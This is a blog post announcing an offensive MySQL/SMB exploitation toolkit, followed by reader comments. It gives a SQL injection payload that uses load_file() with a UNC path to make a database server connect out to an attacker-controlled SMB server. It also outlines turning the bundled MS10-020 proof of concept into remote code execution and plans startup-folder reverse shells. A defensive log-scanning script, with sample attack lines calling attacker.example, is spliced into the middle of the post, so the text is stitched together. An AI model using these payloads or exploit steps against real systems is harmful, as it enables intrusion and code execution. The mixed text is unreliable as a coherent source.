MySQL network exploitation toolkit 1.1

After some more work I am proud to announce that I will release version 1.1 of the MySQL network exploitation toolkit. For the people who don't follow us that much: this is a tool that makes your computer listen on port 445 and act as an SMB server.
You might wonder how this can be of any use, but with it you can entirely remove the blind MySQL injection problem, by letting the database server connect to you and adding some information to the query.
Here is a picture I just made to explain it for the people who missed the previous posts:

In this picture I tried to simulate the following MySQL injection:

index.php?id=1 AND load_file(concat('\\\\you\\', information()))

This would cause the MySQL server to connect back to you over the SMB protocol and try to fetch a file whose name is the output of the information() function; as you can see, it requires very little.
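As an added defensive example, not code from the toolkit or the post: a small Python check that scans MySQL general-query-log lines (constructed samples below) for load_file() combined with a UNC path, the out-of-band SMB callback described above, plus a helper that classifies the server's secure_file_priv setting, the variable that confines or disables what load_file() may read. The log lines, hostnames and function names in it are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in MySQL general-query-log style (not from the post).
# Lines 2 and 4 carry the UNC callback pattern from the article; line 3 reads a
# local path and line 1 is a normal query.
SAMPLE_LOG = r"""
2010-07-10T12:00:01Z  12 Query  SELECT * FROM items WHERE id=1
2010-07-10T12:00:02Z  12 Query  SELECT * FROM items WHERE id=1 AND load_file(concat('\\\\203.0.113.5\\', version()))
2010-07-10T12:00:03Z  13 Query  SELECT LOAD_FILE('/etc/hostname')
2010-07-10T12:00:04Z  14 Query  SELECT * FROM items WHERE id=1 AND LOAD_FILE(CONCAT('\\\\attacker.example\\', user()))
"""
SAMPLE_LINES = [l for l in SAMPLE_LOG.splitlines() if l.strip()]

LOAD_FILE_RE = re.compile(r"load_file\s*\(", re.IGNORECASE)
# A UNC prefix inside a MySQL string literal is written with doubled backslashes
# ('\\\\host\\share'); match two or more and capture the host that follows.
UNC_RE = re.compile(r"\\{2,}([A-Za-z0-9][A-Za-z0-9.\-]*)")


def find_load_file_callbacks(lines):
    """Return (line_no, host) for every query that combines load_file() with a
    UNC path, i.e. an attempted out-of-band SMB connection from the DB server."""
    hits = []
    for no, line in enumerate(lines, 1):
        text = unquote(line)  # web access logs carry the same query URL-encoded
        if not LOAD_FILE_RE.search(text):
            continue
        m = UNC_RE.search(text)
        if m:
            hits.append((no, m.group(1).lower()))
    return hits


def secure_file_priv_risk(value):
    """Classify the value of SHOW VARIABLES LIKE 'secure_file_priv'.
    '' lets load_file() open any path the mysqld account can reach, UNC paths
    included; NULL disables load_file()/INTO OUTFILE; a directory confines reads
    to that directory, so a UNC path is refused."""
    if value is None or value.strip().upper() == "NULL":
        return "disabled"
    if value.strip() == "":
        return "unrestricted"
    return "confined"


if __name__ == "__main__":
    for no, host in find_load_file_callbacks(SAMPLE_LINES):
        print(f"line {no}: load_file() targets UNC host {host}")
    print("secure_file_priv='' ->", secure_file_priv_risk(""))
```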

Alright, I think you have an idea of how it works. Now the second, tricky part kicks in: we can attack the SMB client on the database server's side. When the MySQL server connects to you it uses the default SMB client, and by proper exploitation of that SMB client you get remote code execution; with some luck you will get kernel level access this way.
I included two exploits: MS10-020 and a lame DoS in the NetBIOS protocol.

I did not yet release the actual trick on how to exploit the client side SMB client with MS10-020, because it would cause major problems on the internet and lots of servers would get compromised.
I think it's better if I keep this trick for something longer. I was scheduled to talk about this tool at Hack in the Box (HitB) at the Krasnapolsky in Amsterdam, but the speaker before me talked through my time slot about router security, and unfortunately Saumil Shah gave a very interesting talk after that in another room which no one wanted to miss (me neither, because it was brilliant! :D ).

Anyhow, if you have experience with exploiting buffer overflows it is a piece of cake to turn this into remote code execution. In the file smb2.py on line 194 there is the PoC which Laurent Gaffié released back in April; I even pointed out where the EIP and EBP get overwritten. If you first spam the buffer with some packets, analyze where the buffer gets filled and let EIP jump to that place, there is a chance it will get reliable enough to trigger the remote code execution. For now it's just a DoS (blue screen of death), which can prove that the server is vulnerable.

Then there is still a third trick which I will be working on in the next versions of this tool: brute forcing the internal network and putting things in the startup folder, so that when the machines restart they will connect to you with a fresh shell.
Here is a picture I just made to explain it to you:

This release has more capability to talk with SMB clients the proper way, and it provides more stability.
I also made the code more organized and the way you will get the results is a lot cleaner in this version.
Have fun with it!
You can download version 1.1 in the download section here.

Hello, I am Jelmer, born in 1991. I have been playing in IT security for over half my age; I am not sure when, how and why it started, but I like it. I met Fredrik and Mathias through the internet. This is my Twitter account, feel free to follow me. You can contact me via email jelmerdehen [ at ] hotmail [d0t] com or you can chat with me in the IRC.

6 Comments

  1. Tweets that mention MySQL network exploitation toolkit 1.1 -- Topsy.com says:

    [...] This post was mentioned on Twitter by Jelmer de Hen, AckAck. AckAck said: New Post: MySQL network exploitation toolkit 1.1 ( http://h.ackack.net/mysql-network-exploitation-toolkit-1-1.html ): After some more work [...]

  2. Johan Edholm says:

  3. The reincarnation of the RFI says:

    [...] so fast! If an attacker writes a rogue SMB server, just like Jelmer did in the “MySQL Network Exploitation Toolkit”, he could remotely load a shell or send back a malicious payload to exploit one of the many [...]

  4. Ayden Gibson says:

    how the hell do you use this?

  5. The reincarnation of the RFI | BlackRootKit's Blog says:

    [...] so fast! If an attacker writes a rogue SMB server, just like Jelmer did in the “MySQL Network Exploitation Toolkit”, he could remotely load a shell or send back a malicious payload to exploit one of the many [...]
